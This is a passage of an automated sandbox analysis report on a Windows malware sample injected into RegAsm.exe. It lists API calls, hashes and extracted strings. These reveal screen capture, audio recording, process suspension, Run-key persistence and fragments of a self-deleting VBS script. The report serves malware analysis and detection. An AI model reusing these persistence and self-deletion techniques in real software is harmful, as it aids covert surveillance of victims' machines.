                                                                • Opcode Fuzzy Hash: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                                                                • Instruction Fuzzy Hash: 7AD05E36204121E3C220176A7C0CD97AD68DBC5AA2705412AF804C22609A60CC0186E4
                                                                APIs
                                                                • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041603A,00000000), ref: 0041BBA5
                                                                • NtSuspendProcess.NTDLL(00000000), ref: 0041BBB2
                                                                • CloseHandle.KERNEL32(00000000,?,?,0041603A,00000000), ref: 0041BBBB
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$CloseHandleOpenSuspend
                                                                • String ID:
                                                                • API String ID: 1999457699-0
                                                                • Opcode ID: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                                                • Instruction ID: 611eda4fe747f1c58df557fb912083c2b4b70512fbfbfb6239720577e9304ccf
                                                                • Opcode Fuzzy Hash: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                                                • Instruction Fuzzy Hash: 98D05E36204121E3C7211B6A7C0CD97AD68DFC5AA2705412AF804D26549A20CC0186E4
                                                                APIs
                                                                • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434CCF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FeaturePresentProcessor
                                                                • String ID: MZ@
                                                                • API String ID: 2325560087-2978689999
                                                                • Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                                • Instruction ID: 5e37b39ef68b784d6588b9ddffa6793edf4c3ade0924e8be62ba08be237937aa
                                                                • Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                                • Instruction Fuzzy Hash: E4515B71D002488FEB24CF69D98579EBBF4FB88314F24956BD419EB264D378A940CF98
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: .
                                                                • API String ID: 0-248832578
                                                                • Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                • Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
                                                                • Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                • Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: .
                                                                • API String ID: 0-248832578
                                                                • Opcode ID: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                                                • Instruction ID: 7baa6cf80f4bdea99dbc4d330b45aada8194c6230f36d830dc1b60d3871032d3
                                                                • Opcode Fuzzy Hash: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                                                • Instruction Fuzzy Hash: DF3107B1900259AFEB24DE7ACC84EFB7BBDEB46318F0401AEF41897291E6349D418B54
                                                                APIs
                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                • EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                • String ID: JD
                                                                • API String ID: 1084509184-2669065882
                                                                • Opcode ID: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                                • Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
                                                                • Opcode Fuzzy Hash: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                                • Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
                                                                APIs
                                                                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InfoLocale
                                                                • String ID: GetLocaleInfoEx
                                                                • API String ID: 2299586839-2904428671
                                                                • Opcode ID: 53574c2ecf56bfb558b2c309ca3eb91f9c7a0a18e0f2245662e0b0bedf18becb
                                                                • Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
                                                                • Opcode Fuzzy Hash: 53574c2ecf56bfb558b2c309ca3eb91f9c7a0a18e0f2245662e0b0bedf18becb
                                                                • Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
                                                                APIs
                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast$_free$InfoLocale_abort
                                                                • String ID:
                                                                • API String ID: 1663032902-0
                                                                • Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                                • Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
                                                                • Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                                • Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
                                                                APIs
                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast$InfoLocale_abort_free
                                                                • String ID:
                                                                • API String ID: 2692324296-0
                                                                • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                                • Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
                                                                • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                                • Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694
                                                                APIs
                                                                  • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(-0006D41D,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                                                • EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                • String ID:
                                                                • API String ID: 1272433827-0
                                                                • Opcode ID: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                                • Instruction ID: 901ea181f65c0ebd25502bb0be635eecd519ab6688482fb1bf3a60b9f01fb263
                                                                • Opcode Fuzzy Hash: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                                • Instruction Fuzzy Hash: 37F04F76A50200EFEB00EF69D946B4D37E0FB04725F10446EF514DB2A2DB7899809B49
                                                                APIs
                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                • EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                • String ID:
                                                                • API String ID: 1084509184-0
                                                                • Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                                • Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
                                                                • Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                                • Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754
                                                                APIs
                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00034BE4,0043490B), ref: 00434BDD
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled
                                                                • String ID:
                                                                • API String ID: 3192549508-0
                                                                • Opcode ID: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                                • Instruction ID: 702e07acd891e046c8aea5fc6397425f5e3bd38ef0af78e1c7fed93ac6412050
                                                                • Opcode Fuzzy Hash: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                                • Instruction Fuzzy Hash:
                                                                APIs
                                                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                                                  • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                                                • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                                                • DeleteDC.GDI32(00000000), ref: 00418F65
                                                                • DeleteDC.GDI32(00000000), ref: 00418F68
                                                                • DeleteObject.GDI32(00000000), ref: 00418F6B
                                                                • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                                                • DeleteDC.GDI32(00000000), ref: 00418F9D
                                                                • DeleteDC.GDI32(00000000), ref: 00418FA0
                                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                                                • GetCursorInfo.USER32(?), ref: 00418FE2
                                                                • GetIconInfo.USER32(?,?), ref: 00418FF8
                                                                • DeleteObject.GDI32(?), ref: 00419027
                                                                • DeleteObject.GDI32(?), ref: 00419034
                                                                • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
                                                                • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                                                • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                                                • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                                                • DeleteDC.GDI32(?), ref: 004191B7
                                                                • DeleteDC.GDI32(00000000), ref: 004191BA
                                                                • DeleteObject.GDI32(00000000), ref: 004191BD
                                                                • GlobalFree.KERNEL32(?), ref: 004191C8
                                                                • DeleteObject.GDI32(00000000), ref: 0041927C
                                                                • GlobalFree.KERNEL32(?), ref: 00419283
                                                                • DeleteDC.GDI32(?), ref: 00419293
                                                                • DeleteDC.GDI32(00000000), ref: 0041929E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                                                • String ID: DISPLAY
                                                                • API String ID: 4256916514-865373369
                                                                • Opcode ID: b81785b538983269000155a5db9ce9f88dc46a30689f781578aa582ea0c925e1
                                                                • Instruction ID: e1b8f987aa81746083de8242de432fb1856ba331ec6d7e725e66c1191a76d441
                                                                • Opcode Fuzzy Hash: b81785b538983269000155a5db9ce9f88dc46a30689f781578aa582ea0c925e1
                                                                • Instruction Fuzzy Hash: 64C14C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
                                                                APIs
                                                                  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                  • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                  • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                                                • ExitProcess.KERNEL32 ref: 0040D80B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                • String ID: """, 0$")$8SG$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                • API String ID: 1861856835-1447701601
                                                                • Opcode ID: d8e98d1fd2f1bdc760dae9a559abea4cd274c949fa03be3778951f2c3f1c4be1
                                                                • Instruction ID: 9f807323933333198641953f201c1fc8368d74e19fdabe041c5449f7db564f80
                                                                • Opcode Fuzzy Hash: d8e98d1fd2f1bdc760dae9a559abea4cd274c949fa03be3778951f2c3f1c4be1
                                                                • Instruction Fuzzy Hash: 8791B0716082005AC315FB62D8529AF77A8AFD4309F10443FB64AA71E3EF7C9D49C65E
                                                                APIs
                                                                  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
                                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
                                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                  • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,6BFB8300,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                                                • ExitProcess.KERNEL32 ref: 0040D454
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF
                                                                • API String ID: 3797177996-2483056239
                                                                • Opcode ID: 9f8aff639c038808ac3b2befcd98474336a74f9fecab3a97dc503a806b773c90
                                                                • Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
                                                                • Opcode Fuzzy Hash: 9f8aff639c038808ac3b2befcd98474336a74f9fecab3a97dc503a806b773c90
                                                                • Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E
                                                                APIs
                                                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004124CF
                                                                • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                                                • CloseHandle.KERNEL32(00000000), ref: 00412576
                                                                • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                                                • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                                                • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                                                • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                                                                  • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                                                • Sleep.KERNEL32(000001F4), ref: 004126BD
                                                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                                                • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                                                • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                                • String ID: .exe$8SG$WDH$exepath$open$temp_
                                                                • API String ID: 2649220323-436679193
                                                                • Opcode ID: 1b3fed83da2aab5ae681b9012af93f6771012d14136d86493a6b51ff35766dc4
                                                                • Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
                                                                • Opcode Fuzzy Hash: 1b3fed83da2aab5ae681b9012af93f6771012d14136d86493a6b51ff35766dc4
                                                                • Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
APIs
• mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
• mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
• PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B21F
• mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
• mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
• mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
• SetEvent.KERNEL32 ref: 0041B2AA
• WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
• CloseHandle.KERNEL32 ref: 0041B2CB
• mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
• mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
Yara matches
Similarity
